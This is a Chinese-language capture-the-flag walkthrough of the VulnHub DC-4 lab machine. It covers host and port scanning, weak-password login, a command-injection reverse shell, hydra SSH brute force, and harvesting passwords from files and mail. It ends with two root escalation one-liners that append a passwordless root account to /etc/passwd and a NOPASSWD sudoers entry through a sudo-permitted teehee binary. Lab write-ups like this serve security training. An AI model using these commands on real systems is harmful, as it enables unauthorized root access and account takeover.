点击蓝字 关注我们

DC-4打靶记录

靶机获取地址

https://www.vulnhub.com/entry/dc-4,313/

一、存活主机探测

arp-scan -l

确定IP

192.168.117.153

二、端口信息扫描

选择快速半开全端口扫描

nmap -sS -A -T4 -p 1-65535 192.168.117.153

确定目标

先访问80 端口

三、Getshell

啊？？？

开局一个登录框 呢这不能忍

弱口令、万能密码、爆破

直接弱口令 + 万能密码 + 爆破一起来。

啊？这这估计是后端设置的爆破次数 怕有些师傅们字典不行

反正就是进去了

进去之后 ，啊？直接一个RCE吗?

只能执行三个吗？

我不信！抓包看一下

果然，尝试一下反弹shell

这里有个小问题 它默认用加号代替空格了

我这边等的话shell过来了

然后用python反弹出一个完整shell

python -c 'import pty;pty.spawn("/bin/bash")'

四、提权

看看/etc/passwd

老说法 咱有个22端口没有用

翻翻家目录

试试找好密码来爆破ssh到charles里面

这个时候在jim里面发现一个旧密码包

做成密码包

hydra -L xxx -P xxx ssh://xxx.xxx.xxx

成功出来一个用户名密码

登录去看看

有一个邮件 好吧

查看邮箱

cat /var/mail/jim

里面有密码

切换到charles

sudo -l

发现teehee可用

teehee --help

发现可以向文件里面写入内容

所以我们有两种提权办法

方法一：写/etc/passwd文件

echo "ikkkk::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd

方法二：写入sudoers文件

echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"